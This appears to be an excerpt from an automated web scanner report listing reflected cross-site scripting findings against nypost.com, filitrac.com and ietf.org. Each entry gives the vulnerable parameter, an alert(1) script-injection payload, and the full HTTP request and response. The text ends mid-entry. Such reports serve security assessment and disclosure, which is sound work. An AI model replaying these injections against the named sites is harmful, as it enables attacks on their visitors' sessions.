HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:06 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=b52000f6d57e8b787a309d54bd570139; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=3ecf6510eb226343b6ae39574703867a; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1ENzBEQTVDMjRENTBBQjI2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNjt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8e1"><script>alert(1)</script>f52bfa6af88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehiclebc8e1"><script>alert(1)</script>f52bfa6af88/commercial_truck/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:05 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=9f0624363c8b15dccf611d750c2be872; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=686b94be6bdc27b9ceab2db9011119c9; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1DRUI4RTZCQzRENTBBQjI1; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b4d1"><script>alert(1)</script>c1eb8da859f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle5b4d1"><script>alert(1)</script>c1eb8da859f/motorcycle/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:07 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=c4d87cb29211116f1d84d383dec91eab; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=ab8f61ec5acb038133e79b13dcca0726; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1FOThEN0U2QTRENTBBQjI3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyNzt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91fb0"-alert(1)-"4be135d4517 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /vehicle91fb0"-alert(1)-"4be135d4517/motorcycle/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Tue, 08 Feb 2011 02:32:08 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: otu=46e1bc3aaff423d92d301a3013941096; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: ots=635d3f0a77da507bccb54c98bf67f230; path=/; domain=.classifieds.nypost.com Set-Cookie: a=dT1DODI5QTlERTRENTBBQjI4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMyODt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of the FiliAff request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b57e'-alert(1)-'b4b4ed5a7c was submitted in the FiliAff parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Click.aspx?tid=92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC&FiliAff=267492b57e'-alert(1)-'b4b4ed5a7c&sid=exit HTTP/1.1 Host: www.filitrac.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 08 Feb 2011 05:32:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=el2q5mrsx1bsw521aiud0555; path=/; HttpOnly Set-Cookie: cca=url=http%3a%2f%2fwww.filitrac.com%2fClick.aspx%3ftid%3d92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC%26FiliAff%3d267492b57e'-alert(1)-'b4b4ed5a7c%26sid%3dexit&siteid=26749&marketinglevel=0; expires=Fri, 08-Feb-2013 05:32:38 GMT; path=/ Set-Cookie: xzOMTxRz%2f08%3d=ZBVtZyh9mLheFE4ndJ1f3WQ91wk3D5MTdytPV2esxOkISKH2tSSAE73lDiWMpwmuRquz9NJAxV74Urlaf49qoA%3d%3d; expires=Thu, 10-Mar-2011 05:32:38 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1189 p3p: policyref="http://filitrac.com/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head><title> Click </title><meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"><meta name="CODE_LANGUAGE" ...[SNIP]... <script>window.location='http://tracking.boostoffers.com/aff_c?offer_id=31&aff_id=51&aff_sub=26749&FiliAff=267492b57e'-alert(1)-'b4b4ed5a7c'</script> ...[SNIP]...
1.161. http://www.filitrac.com/Click.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.filitrac.com
Path:
/Click.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload deece'%3balert(1)//9bd7996a908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as deece';alert(1)//9bd7996a908 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Click.aspx?tid=92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC&FiliAff=26749&sid=exit&deece'%3balert(1)//9bd7996a908=1 HTTP/1.1 Host: www.filitrac.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 08 Feb 2011 05:32:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3n0yk545rpdkwi45kxb554u1; path=/; HttpOnly Set-Cookie: cca=url=http%3a%2f%2fwww.filitrac.com%2fClick.aspx%3ftid%3d92D827061D4CB6AFBE990C6ABE26C2FC26252769EADF72DC%26FiliAff%3d26749%26sid%3dexit%26deece'%3balert(1)%2f%2f9bd7996a908%3d1&siteid=26749&marketinglevel=0; expires=Fri, 08-Feb-2013 05:32:45 GMT; path=/ Set-Cookie: xzOMTxRz%2f08%3d=ZBVtZyh9mLheFE4ndJ1f3WQ91wk3D5MT%2fFqwoAxqMoCESPGASQ%2fXr9ZUw11ln7nKhXOAXEuCM91B1GAwMVTGIw%3d%3d; expires=Thu, 10-Mar-2011 05:32:45 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1215 p3p: policyref="http://filitrac.com/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <html> <head><title> Click </title><meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"><meta name="CODE_LANGUAGE" ...[SNIP]... <script>window.location='http://tracking.boostoffers.com/aff_c?offer_id=31&aff_id=51&aff_sub=26749&FiliAff=26749&deece';alert(1)//9bd7996a908=1'</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9355a<script>alert(1)</script>1289f0bffc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rfc9355a<script>alert(1)</script>1289f0bffc4/rfc2396.txt HTTP/1.1 Host: www.ietf.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 05:33:05 GMT Server: Apache/2.2.4 (Linux/SUSE) mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.1 mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9216
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ ...[SNIP]... <p>You requested: http://www.ietf.org/rfc9355a<script>alert(1)</script>1289f0bffc4/rfc2396.txt</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9415<script>alert(1)</script>c3f3413731f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rfc/rfc2396.txtb9415<script>alert(1)</script>c3f3413731f HTTP/1.1 Host: www.ietf.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 05:33:15 GMT Server: Apache/2.2.4 (Linux/SUSE) mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.1 mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.6 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 9216
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ ...[SNIP]... <p>You requested: http://www.ietf.org/rfc/rfc2396.txtb9415<script>alert(1)</script>c3f3413731f</p> ...[SNIP]...
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd748"><script>alert(1)</script>56a717121ed was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Fragment/SysConfig/WebPortal/nypost/blocks/_user/blocks/login_standalone.jpt?redirect=/bd748"><script>alert(1)</script>56a717121ed HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;
Response
HTTP/1.1 200 OK Content-Length: 1156 Content-Type: text/html;charset=UTF-8 Expires: Tue, 08 Feb 2011 02:33:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 08 Feb 2011 02:33:52 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 861d6<script>alert(1)</script>39a1c29746b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig861d6<script>alert(1)</script>39a1c29746b/WebPortal/nypost/blocks/_homepage/columnists/columnists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a6cb<script>alert(1)</script>a2e646f15e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal9a6cb<script>alert(1)</script>a2e646f15e4/nypost/blocks/_homepage/columnists/columnists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:32 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3192f<script>alert(1)</script>ce481558adf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost3192f<script>alert(1)</script>ce481558adf/blocks/_homepage/columnists/columnists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:33 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 59c0d<script>alert(1)</script>06928e5fd29 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks59c0d<script>alert(1)</script>06928e5fd29/_homepage/columnists/columnists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:35 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 44dab<script>alert(1)</script>232703e53ee was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage44dab<script>alert(1)</script>232703e53ee/columnists/columnists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:37 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6d512<script>alert(1)</script>4c56166ae8e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists6d512<script>alert(1)</script>4c56166ae8e/columnists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:39 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload a2474<script>alert(1)</script>71fb61d3344 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.cssa2474<script>alert(1)</script>71fb61d3344 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 735 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:41 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ca49c<script>alert(1)</script>fb9e79d983d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigca49c<script>alert(1)</script>fb9e79d983d/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 751 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:19 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cff06<script>alert(1)</script>dce59e57048 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortalcff06<script>alert(1)</script>dce59e57048/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 751 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:21 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f949a<script>alert(1)</script>e6ac455d380 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypostf949a<script>alert(1)</script>e6ac455d380/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 751 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:22 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8670b<script>alert(1)</script>db8e6dc803f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks8670b<script>alert(1)</script>db8e6dc803f/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 751 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:27 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 704f1<script>alert(1)</script>af0fc94043d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos704f1<script>alert(1)</script>af0fc94043d/promos_and_partners/promos_and_partners.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 751 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:29 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 12925<script>alert(1)</script>0cb86b9952 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners12925<script>alert(1)</script>0cb86b9952/promos_and_partners.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 750 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:35 GMT Connection: close
The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload c262d<script>alert(1)</script>8a886726475 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.cssc262d<script>alert(1)</script>8a886726475 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 751 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:36 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bffa7<script>alert(1)</script>5fc3b51a0a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigbffa7<script>alert(1)</script>5fc3b51a0a1/WebPortal/nypost/blocks/ads/ads.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:00 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e4cf7<script>alert(1)</script>aab02ede959 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
